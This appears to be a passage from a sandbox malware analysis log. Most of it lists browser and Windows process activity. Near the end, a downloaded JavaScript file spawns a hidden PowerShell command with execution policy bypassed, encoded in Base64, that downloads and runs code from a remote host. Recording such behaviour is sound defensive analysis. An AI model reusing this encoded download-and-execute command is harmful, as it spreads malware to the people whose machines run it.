PID 3444 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\wordpad.exe C:\Windows\splwow64.exe
PID 3444 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\wordpad.exe C:\Windows\splwow64.exe
PID 3888 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 4932 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 4932 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\wordpad.exe

"C:\Users\Admin\AppData\Local\Temp\wordpad.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2308 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3828 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4552 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4580 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4896 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x25c,0x260,0x264,0x238,0x268,0x7ff674a0ae48,0x7ff674a0ae58,0x7ff674a0ae68

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault65846a50hfc51h4d05h9d25h9864a4563275

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xc0,0x12c,0x7ff996c046f8,0x7ff996c04708,0x7ff996c04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --lang=de --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4268 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5024 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2504 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2860 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5184 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5372 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5504 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3164 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5480 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=3068 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5296 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4000 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5724 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=2516 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5728 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=3084 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4520 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5196 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5080 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=qrcode_generator.mojom.QRCodeGeneratorService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4400 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\" -spe -an -ai#7zMap26044:190:7zEvent3368

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

